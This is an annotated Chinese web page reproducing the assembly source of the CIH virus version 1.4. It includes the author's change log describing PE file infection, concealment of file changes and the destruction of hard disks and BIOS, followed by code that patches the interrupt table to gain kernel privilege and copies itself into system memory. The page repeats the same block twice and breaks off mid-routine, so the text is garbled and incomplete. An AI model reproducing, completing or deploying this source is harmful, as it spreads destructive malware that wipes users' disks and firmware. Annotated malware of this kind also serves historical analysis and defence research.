添加时间:2002-8-19 来源: 阅读2882次
;CIH病毒1.4版本之中文注释由"邹丹"编写完成于1999-4-09
;源程序中的英文注释未作修改,全部保留
;电子邮件: zd_dan@263.net
;个人主页: zdweb.yeah.net
;本人所编写之注释仅供研究之用,如作其他用途,概于本人无关!!!
;!!!!!!后附精彩后记,敬请留意!!!!!! ; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ;编译连接方法
; * * ;使用的是TurboAssembler
; *==========================================================================* ;可在Borland C++ 3.1中找到
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size… ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS… Super… Killer… *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
.586P ;586保护模式汇编
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader: ;编译连接后的PE格式可执行文件文件头
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1 ;主版本号
MinorVirusVersion = 4 ;副版本号
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本号
IF DEBUG ;是否是调试用
FirstKillHardDiskNumber = 81h ;杀掉第二个硬盘“d:”
HookExceptionNumber = 05h ;使用5号中断
ELSE
FirstKillHardDiskNumber = 80h ;杀掉第一个硬盘“c:”
HookExceptionNumber = 03h ;使用3号中断
ENDIF
FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0
@0:
pop ebx ;获取程序起始偏移量?
;用此偏移量+相对偏移量获得绝对地址(病毒程序大量用到)
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege… *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address ?;获得中断描述符表的基址到ebx
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;计算要用中断的基址到ebx
cli ;在改表项前关中断?
Mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point ?;取得中断基址到ebp
lea esi, MyExceptionHook-@1[ecx]
push esi ?;esi为病毒中断例程地址
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address;修改中断基址使指向病毒中断例程
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException;以中断的方式进入0级
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax ;esi指向病毒开始处
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb ;拷贝病毒代码到分配好的系统内存首址
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷贝结束
jmp LoopOfMergeAllVirusCodeSection ;拷贝下一段
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Aga
;再一次进入0级
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti ;开中断
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
;把原程序的开始地址压栈
ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的开始处
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook ;如果病毒代码已拷贝好了
;转到安装文件系统钩子的程序
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0 ;察看dr0是否设置过(dr0为病毒驻留标志)
jecxz AllocateSystemMemoryPage ;没有设置,则分配系统内存
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ; ;恢复原来的中断基址
iretd ;中断返回
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
;设置dr0,它是病毒驻留的标志
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;调用方法ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM,
;ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr,
;ULONG flags);
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate;VXD调用
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h ;恢复栈指针
xchg edi, eax ; EDI = SystemMemory Start Address
; EDI指向分配好的系统内存首址
lea eax, MyVirusStart-@2[esi] ;eax指向病毒开始处
iretd ; Return to Ring3 Initial Program ;退出中断,回3级(回到"Merge All Virus Code Section)
;源程序中的英文注释未作修改,全部保留
;电子邮件: zd_dan@263.net
;个人主页: zdweb.yeah.net
;本人所编写之注释仅供研究之用,如作其他用途,概于本人无关!!!
;!!!!!!后附精彩后记,敬请留意!!!!!! ; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ;编译连接方法
; * * ;使用的是TurboAssembler
; *==========================================================================* ;可在Borland C++ 3.1中找到
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size… ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS… Super… Killer… *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
.586P ;586保护模式汇编
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader: ;编译连接后的PE格式可执行文件文件头
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1 ;主版本号
MinorVirusVersion = 4 ;副版本号
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本号
IF DEBUG ;是否是调试用
FirstKillHardDiskNumber = 81h ;杀掉第二个硬盘“d:”
HookExceptionNumber = 05h ;使用5号中断
ELSE
FirstKillHardDiskNumber = 80h ;杀掉第一个硬盘“c:”
HookExceptionNumber = 03h ;使用3号中断
ENDIF
FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0
@0:
pop ebx ;获取程序起始偏移量?
;用此偏移量+相对偏移量获得绝对地址(病毒程序大量用到)
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege… *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address ?;获得中断描述符表的基址到ebx
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;计算要用中断的基址到ebx
cli ;在改表项前关中断?
Mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point ?;取得中断基址到ebp
lea esi, MyExceptionHook-@1[ecx]
push esi ?;esi为病毒中断例程地址
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address;修改中断基址使指向病毒中断例程
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException;以中断的方式进入0级
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax ;esi指向病毒开始处
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb ;拷贝病毒代码到分配好的系统内存首址
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷贝结束
jmp LoopOfMergeAllVirusCodeSection ;拷贝下一段
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Aga
;再一次进入0级
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti ;开中断
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
;把原程序的开始地址压栈
ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的开始处
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook ;如果病毒代码已拷贝好了
;转到安装文件系统钩子的程序
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0 ;察看dr0是否设置过(dr0为病毒驻留标志)
jecxz AllocateSystemMemoryPage ;没有设置,则分配系统内存
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ; ;恢复原来的中断基址
iretd ;中断返回
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
;设置dr0,它是病毒驻留的标志
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;调用方法ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG VM,
;ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr,
;ULONG flags);
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate;VXD调用
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h ;恢复栈指针
xchg edi, eax ; EDI = SystemMemory Start Address
; EDI指向分配好的系统内存首址
lea eax, MyVirusStart-@2[esi] ;eax指向病毒开始处
iretd ; Return to Ring3 Initial Program ;退出中断,回3级(回到"Merge All Virus Code Section)
上一篇:
我刚在google开了个空间
下一篇:
通过了富士康的考试